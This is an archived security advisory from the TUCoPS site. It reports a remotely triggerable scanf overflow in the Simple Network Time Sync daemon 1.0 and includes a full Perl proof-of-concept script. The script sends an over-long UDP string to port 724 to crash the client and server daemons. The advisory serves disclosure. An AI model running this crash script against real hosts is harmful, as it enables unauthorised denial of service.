Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: snts.htm

Simple Network Time Sync overflow, possibly exploitable



Vulnerability

    Simple Network Time Sync

Affected

    Simple Network Time Sync

Description

    'logistix' found following.  He noticed an uncommon scanf overflow
    in the  Simple Network  Time Sync  daemon and  client version 1.0,
    tested on Redhat 6.1.  He  hasn't looked into this fully yet,  but
    it looks  as tho  it could  be root  comprimising as  it sits on a
    priveledged  udp  port  and  seems  to  coredump,  but  looks like
    it only gives  you 50 chars  to run code  with.  He  included some
    perl here which will crash it remotely by sending it a string over
    50 chars.

    #!/usr/bin/perl -w
    #
    # Usage: ./kill_sntsd <hostname>
    #
    
    use Socket;
    
    send_packet(); # Needs to send 2 packets to kill the client
    and the server daemons
    send_packet();
    
    sub send_packet {
    
    $proto = getprotobyname('udp');
    $localaddr = gethostbyname("localhost") || die "error: $!
    \n";
    $iaddr = gethostbyname($ARGV[0]) || die "$!\n";
    $sin = sockaddr_in(724, $iaddr);
    $paddr = sockaddr_in(53, $localaddr);
    socket(SH, PF_INET, SOCK_DGRAM, $proto);
    bind(SH, $paddr);
    
    $|=1;
    
    connect(SH, $sin) || die "$!\n";
    
    # A string longer than 50 characters...
    print
    SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix
    \n";
    close(SH);
    
    }

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH